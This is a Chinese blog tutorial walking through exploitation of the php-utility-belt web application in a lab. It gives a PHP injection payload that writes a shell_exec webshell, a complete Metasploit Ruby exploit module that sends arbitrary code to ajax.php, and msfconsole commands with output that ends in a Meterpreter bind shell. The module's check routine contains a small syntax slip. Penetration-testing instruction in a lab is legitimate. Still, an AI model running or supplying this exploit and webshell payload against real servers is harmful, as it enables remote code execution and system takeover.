渗透之——Metasploit渗透php-utility-belt程序
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86526103
攻击机 kali 192.168.109.137
靶机:Win XP 192.168.109.141
应用程序 php-utility-belt (可以到链接:https://download.csdn.net/download/l1028386804/10923054 下载)
1.部署php-utility-belt
由于php-utility-belt是php程序,所以我们需要安装php环境,这里我为了简单直接安装了wamp环境。
将php-utility-belt解压后放在wamp的www目录下,
同时在浏览器中访问链接:http://192.168.109.141/php-utility-belt/
如下图所示:
显示这个页面就证明我们部署成功了。
2.构造并提交攻击脚本
我们文本框中输入如下代码:
fwrite(fopen('info.php','w'), '<?php $a = "net user"; echo shell_exec($a);?>');
并点击Run按钮
3.查看php-utility-belt下的文件
此时,我们发现php-utility-belt下多了一个info.php文件
我们查看这个文件的内容:
4.访问info.php
我们在浏览器中输入:http://192.168.109.141/php-utility-belt/info.php 访问info.php。
这里,会显示靶机上的所有用户,说明php-utility-belt存在漏洞。
5.进一步分析php-utility-belt的漏洞
在google或firefox浏览器按下F12键,通过对网页代码的分析,文本框中的数据是通过参数code进行post提交的。
6.编写攻击脚本php_utility_belt_attack_by_binghe.rb
##
# Author 冰河
# Date 2019-01-17
# Description Metasploit渗透 php utility belt
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
include Msf:: Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP Utility Belt Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in P
},
'Author' =>
[
'binghe'
],
'DisclosureDate' => '2019-01-17',
'Platform' => 'php',
'Payload' =>
{
'Space' => 2000,
# 现在的漏洞在一个Web应用程序中,而不是在软件程序中,所以要将DisableNops的值设置为true以关闭攻击载荷中的NOP
'DisableNops' => true
},
'Targets' =>
[
['PHP Utility Belt', {}]
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']),
OptString.new('CHECKURI', [false, 'Checking Perpose', '/php-utility-belt/info.php']),
], self.class)
end
def check
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
'code' => "fwrite(fopen('info.php','w'), '<?php echo phpinfo();?>');"
}
)
resp = send_request_raw({'uri' => normalize_uri(datastore['CHECKURI']), 'method' => 'GET'})
if resp.body = ~/phpinfo()/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
'code' => payload.encoded
}
)
end
end
7.上传攻击脚本php_utility_belt_attack_by_binghe.rb
将攻击脚本php_utility_belt_attack_by_binghe.rb上传的Kali的/usr/share/metasploit-framework/modules/exploits/web/php目录下。
8.运行攻击脚本php_utility_belt_attack_by_binghe.rb
msfconsole
use exploit/web/php/php_utility_belt_attack_by_binghe
set payload php/meterpreter/bind_tcp
set RHOST 192.168.109.141
show options
exploit
sysinfo
具体操作效果如下:
msf > use exploit/web/php/php_utility_belt_attack_by_binghe
msf exploit(web/php/php_utility_belt_attack_by_binghe) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf exploit(web/php/php_utility_belt_attack_by_binghe) > set RHOST 192.168.109.141
RHOST => 192.168.109.141
msf exploit(web/php/php_utility_belt_attack_by_binghe) > show options
Module options (exploit/web/php/php_utility_belt_attack_by_binghe):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECKURI /php-utility-belt/info.php no Checking Perpose
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.109.141 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /php-utility-belt/ajax.php yes The path to PHP Utility Belt
VHOST no HTTP server virtual host
Payload options (php/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.109.141 no The target address
Exploit target:
Id Name
-- ----
0 PHP Utility Belt
msf exploit(web/php/php_utility_belt_attack_by_binghe) > exploit
[*] Started bind TCP handler against 192.168.109.141:4444
[*] Sending stage (38247 bytes) to 192.168.109.141
meterpreter > sysinfo
Computer : LIUYAZHUANG
OS : Windows NT LIUYAZHUANG 5.1 build 2600 (Windows XP Professional Service Pack 3) i586
Meterpreter : php/windows
meterpreter >
到此,我们已经拿到了靶机的Shell,后续就可以进行各种渗透操作了。